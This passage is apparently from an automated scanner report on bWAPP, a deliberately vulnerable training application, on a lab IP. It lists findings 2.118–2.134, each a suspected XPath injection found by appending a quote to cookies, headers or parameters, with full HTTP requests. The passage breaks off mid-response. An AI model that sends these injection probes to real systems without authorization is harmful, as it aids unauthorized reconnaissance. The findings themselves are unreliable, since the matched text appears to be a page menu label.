Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.118. http://192.168.52.147/bWAPP/clickjacking.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:28 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.119. http://192.168.52.147/bWAPP/clickjacking.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13401

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.120. http://192.168.52.147/bWAPP/commandi.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:00 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.121. http://192.168.52.147/bWAPP/commandi.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:11 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.122. http://192.168.52.147/bWAPP/commandi.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12930

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.123. http://192.168.52.147/bWAPP/commandi.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:40:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.124. http://192.168.52.147/bWAPP/commandi.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:26:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.125. http://192.168.52.147/bWAPP/commandi.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:24:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12927

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.126. http://192.168.52.147/bWAPP/login.php [PHPSESSID cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The PHPSESSID cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the PHPSESSID cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119'
Connection: close

login=bee&password=bug&security_level=0&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:04:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.127. http://192.168.52.147/bWAPP/login.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://www.google.com/search?hl=en&q='
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:05:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.128. http://192.168.52.147/bWAPP/login.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:05:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.129. http://192.168.52.147/bWAPP/login.php [form parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The form parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:04:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.130. http://192.168.52.147/bWAPP/login.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php?1'=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:05:03 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.131. http://192.168.52.147/bWAPP/login.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 55
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:04:49 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.132. http://192.168.52.147/bWAPP/login.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0'&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:03:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.133. http://192.168.52.147/bWAPP/sqli_1.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:19 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.134. http://192.168.52.147/bWAPP/sqli_1.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:16:06 GMT
